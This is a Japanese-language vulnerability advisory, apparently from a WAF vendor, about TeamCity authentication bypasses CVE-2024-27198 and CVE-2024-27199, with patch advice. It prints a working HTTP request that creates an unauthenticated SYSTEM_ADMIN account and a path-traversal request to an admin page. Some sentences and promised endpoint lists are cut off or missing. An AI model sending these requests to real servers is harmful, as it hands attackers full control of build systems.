[2024年4月脆弱性レポート] JetBrains TeamCity Autherntication Bypassの脆弱性

TeamCityは、JetBrainsのビルド管理および継続的インテグレーション・サーバーであり、本記事では、最近このサービスで発見された認証バイパス脆弱性CVE-2024-27198およびCVE-2024-27199についての分析を要約する。

2024年3月、JetBrainsはTeamCityで発見されたCVE-2024-27198とCVE-2024-27199に対するパッチをリリースし、Rapid7は脆弱性の分析を発表した。

JetBrains社のTeamCityでは、HTTPウェブサーバをポート8111で実行することができ、細工されたURIと特定のクラスのリクエスト処理でリクエストを送信すると、認証なしで認証が必要なエンドポイントにアクセスできる。

この脆弱性を利用して認証が必要なエンドポイントにアクセスするには、以下の要件を満たす必要があります。

POST /hax?jsp=/app/rest/users.jsp HTTP/1.1Content-Length: 177 Content-Type: application/json

Host: 172.29.228.65:8111
User-Agent: HTTPie

{
"username": "haxor",
"password": "haxor",
"email": "haxor",
"roles": {
"role": [

{

"roleId": "SYSTEM_ADMIN",
"scope": "g"
}
]
}
}

JetBrains の TeamCity HTTP ウェブサーバには、認証を必要としないエンドポイントがいくつかあります。パストラバーサル構文 ../ を利用して、認証を必要とするエンドポイントにアクセスし、システム設定を変更したり機密情報にアクセスしたりすることが可能です。

以下のエンドポイントは認証を必要としないため、悪用可能です。

これらのエンドポイントで./構文を利用することで一般的に攻撃されるエンドポイントは以下の通りである。

攻撃構文の例：

GET /res/../admin/diagnostic.jsp HTTP/1.1 Host: 172.29.228.65:8111 User-Agent: HTTPie

JetBrains社より、これらの脆弱性に対するパッチがリリースされていますので、TeamCity On-Premisesサーバをバージョン2023.11.4以降にアップデートすることで対応可能です。

弊社のAIWAF製品では、CVE-2024-27198を「2186：また、CVE-2024-27199 は「Directory Access Detection」ポリシーで正常に検出されます。

多くの組織で利用されている CI/CD 製品である JetBrains TeamCity に発見されたこれらの脆弱性は容易に悪用可能であるため、早急に最新バージョンにアップデートする必要がある。

当社のAIWAF製品は、JetBrains TeamCityやその他の製品の脆弱性に対応するパターンを開発しており、今後も関連する脆弱性が発見された場合には迅速に対応していく。

Threat Intelligence Report